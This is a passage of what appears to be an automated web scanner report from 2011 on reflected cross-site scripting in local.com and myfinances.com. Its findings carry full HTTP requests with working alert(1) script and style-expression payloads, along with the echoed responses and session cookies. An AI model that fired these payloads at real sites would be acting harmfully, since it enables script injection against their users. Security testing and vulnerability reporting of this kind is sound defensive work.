Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 89105
Date: Thu, 03 Feb 2011 16:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:49:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 89105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=sports&66d6b'-alert(1)-'8080df3d42=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

1.475. http://www.local.com/results.aspx [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c6"%3b652d94a4b4b was submitted in the cid parameter. This input was echoed as d27c6";652d94a4b4b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /results.aspx?keyword=banks&cid=506d27c6"%3b652d94a4b4b&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 131999
Date: Thu, 03 Feb 2011 15:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=0tqwfcmc1mz4bv45earm1z55; path=/; HttpOnly
Set-Cookie: localcom=cid=506d27c6";652d94a4b4b&loc=Dallas%2c+TX&kw=banks&uid=a555a31b-b16a-44e4-835f-482623ce13b9&expdate=634349085792409448&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506d27c6%22%253b652d94a4b4b%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:19 GMT; path=/
Set-Cookie: localcom_s=cid=506d27c6";652d94a4b4b&exp=634323183792409448; domain=local.com; expires=Thu, 03-Feb-2011 16:26:19 GMT; path=/
Content-Length: 131999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
prop1="banks";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Businesses - SERP - SEM";
s.prop8="";
s.campaign = "506d27c6";652d94a4b4b";
s.eVar1="v3:Businesses - SERP - SEM";
s.eVar5="v3:Businesses - SERP - SEM";
s.eVar6="Retail Banks";
s.eVar11="506d27c6";652d94a4b4
...[SNIP]...

1.476. http://www.local.com/results.aspx [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c80ba"style%3d"x%3aexpression(alert(1))"45503434253 was submitted in the cid parameter. This input was echoed as c80ba"style="x:expression(alert(1))"45503434253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506c80ba"style%3d"x%3aexpression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 133517
Date: Thu, 03 Feb 2011 15:56:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; path=/; HttpOnly
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; domain=local.com; expires=Thu, 03-Feb-2011 16:26:17 GMT; path=/
Content-Length: 133517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506c80ba"style="x:expression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

1.477. http://www.local.com/results.aspx [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a134f"style%3d"x%3aexpression(alert(1))"fccc9411126 was submitted in the client parameter. This input was echoed as a134f"style="x:expression(alert(1))"fccc9411126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style%3d"x%3aexpression(alert(1))"fccc9411126 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131540
Date: Thu, 03 Feb 2011 15:56:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:36 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323183968705455; domain=local.com; expires=Thu, 03-Feb-2011 16:26:36 GMT; path=/
Content-Length: 131540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style="x:expression(alert(1))"fccc9411126&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

1.478. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a378"style="x:expression(alert(1))"043ffc8a60a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130504
Date: Thu, 03 Feb 2011 15:56:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=bzp0h255qcweve45j0rd4z55; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=639a705c-136b-485f-8a3e-16b57e26ba7b&expdate=634349086150332423&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_js%269a378%22style%253d%22x%253aexpression(alert(1))%22043ffc8a60a%3d1&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:55 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323184150332423; domain=local.com; expires=Thu, 03-Feb-2011 16:26:55 GMT; path=/
Content-Length: 130504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style="x:expression(alert(1))"043ffc8a60a=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

1.479. http://www.local.com/topics/ [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /topics/

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6f"%3bb0022a17af6 was submitted in the keyword parameter. This input was echoed as b0f6f";b0022a17af6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topics/?topic=food&keyword=foodb0f6f"%3bb0022a17af6 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 33965
Date: Thu, 03 Feb 2011 16:51:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:21 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=foodb0f6f%22%3bb0022a17af6; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 33965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
<script type="text/javascript">
s.pageName="Topics - Landing - Food";
s.prop1="foodb0f6f";b0022a17af6";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Topics - Landing - Food";
s.prop8="Organic";
s.campaign = "506c80ba
...[SNIP]...

1.480. http://www.local.com/ver1.0/Direct/Jsonp [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8cbb2<script>alert(1)</script>2eab8d1e87a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22UpdateArticleAction%22%3A%7B%22Categories%22%3A%5B%5D%2C%22OnPageTitle%22%3A%22Hillcrest%20Bank%20%2528Dallas%252C%20TX%2529%22%2C%22OnPageUrl%22%3A%22104826937%7CHillcrest%20Bank%7CDallas%252C%20TX%22%2C%22Section%22%3A%7B%22Section%22%3A%7B%22Name%22%3A%22Dallas%2C%20TX%22%7D%7D%2C%22UpdateArticle%22%3A%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22104826937%22%7D%7D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript; charset=utf-8
Date: Thu, 03 Feb 2011 16:06:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 188

RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"02/03/2011 08:06:04:885 AM"}],"Responses":[]}});

1.481. http://www.local.com/ver1.0/ReviewPage.app [articleKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/ReviewPage.app

Issue detail

The value of the articleKey request parameter is copied into the HTML document as plain text between tags. The payload 76469<script>alert(1)</script>5cd27d00a02 was submitted in the articleKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/ReviewPage.app?onPage=1&reviewsPerPage=10&articleKey=10482693776469<script>alert(1)</script>5cd27d00a02&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com&rand=1296748922751 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Vary: Content-Encoding
Cache-Control: private
Content-Type: application/json
Date: Thu, 03 Feb 2011 16:06:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 657

{
"ReviewsPage": {
"SortType": {
"SortOrder": "Descending",
"ObjectType": "Models.System.Sorting.TimestampSort"
},
"AverageReviewRating": 0.0,
"TotalItems": 0,
"ReviewOnKey": {
"Key": "10482693776469<script>alert(1)</script>5cd27d00a02",
"ObjectType": "Models.External.ExternalResourceKey"
},
"ItemsPerPage": 10,
"ObjectType": "Responses.Reactions.ReviewsPageResponse",
"Items": [],
"OneBasedOnPage": 1,
...[SNIP]...

1.482. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af164"><script>alert(1)</script>bfea6dcd612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?af164"><script>alert(1)</script>bfea6dcd612=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:03:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:03:03 GMT
Content-Length: 17806
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type="hidden" name="back" value="/?af164"><script>alert(1)</script>bfea6dcd612=1" />
...[SNIP]...

1.483. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b441b'><script>alert(1)</script>2d6ce3f1de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1 HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
